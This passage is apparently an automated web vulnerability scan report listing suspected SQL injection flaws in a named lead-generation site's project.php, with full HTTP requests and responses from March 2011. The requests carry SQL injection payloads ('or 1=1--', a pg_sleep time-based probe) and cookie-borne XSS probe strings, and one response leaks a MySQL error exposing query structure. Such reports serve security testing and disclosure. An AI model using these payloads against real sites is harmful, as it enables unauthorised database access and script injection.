OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:44:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7323
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.437. http://www.insideup.com/ppc/leadflow/inco00/project.php [address parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/inco00/project.php

Issue detail

The address parameter appears to be vulnerable to SQL injection attacks. The payloads 13756426'%20or%201%3d1--%20 and 13756426'%20or%201%3d2--%20 were each submitted in the address parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc&address=Address13756426'%20or%201%3d1--%20&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=%27)%3BSELECT%20pg_sleep(25)--&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A6240CD3E62E72A7A802AF6565414F2D; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:36:16 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=2m09ujognfb7rnefqu85scqqr2; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr
...[SNIP]...

Request 2

GET /ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc&address=Address13756426'%20or%201%3d2--%20&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=%27)%3BSELECT%20pg_sleep(25)--&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A6240CD3E62E72A7A802AF6565414F2D; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:36:20 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=mbe8lbhoe3balcvj4e87cttp85; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41708


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Incorporation, Use InsideUp to Get Quotes and Compare Incorporation Vendors </title>
   <meta name="description" content="Let incorporation vendors compete for your incorporation needs. Compare local and national incorporation vendors."/>
   <meta name="keywords" content=" Incorporation "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 7    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr>
            <td width="175" valign="middle">
                <div style="padding-top: 13px; padding-bottom: 7px; padding-
...[SNIP]...

1.438. http://www.insideup.com/ppc/leadflow/inco00/project.php [address parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/inco00/project.php

Issue detail

The address parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the address parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc&address=Address'&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=3074__Corporation&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone='+OR+'1'%3d'1&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:38:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=u3cssvma5ssnbip7tdq3o2kso4; path=/
Content-Length: 5246
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
eId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=' OR '1'='1&subcategoryId=60003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=' OR '1'='' at line 5

Request 2

GET /ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc&address=Address''&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=3074__Corporation&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone='+OR+'1'%3d'1&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:38:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=8g87jl7kqpbit0ca95thl3u6u1; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41708


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.439. http://www.insideup.com/ppc/leadflow/inco00/project.php [attributeId_342_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/inco00/project.php

Issue detail

The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. The payloads 10315083'%20or%201%3d1--%20 and 10315083'%20or%201%3d2--%20 were each submitted in the attributeId_342_g parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance10315083'%20or%201%3d1--%20&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=%27)%3BSELECT%20pg_sleep(25)--&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A6240CD3E62E72A7A802AF6565414F2D; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 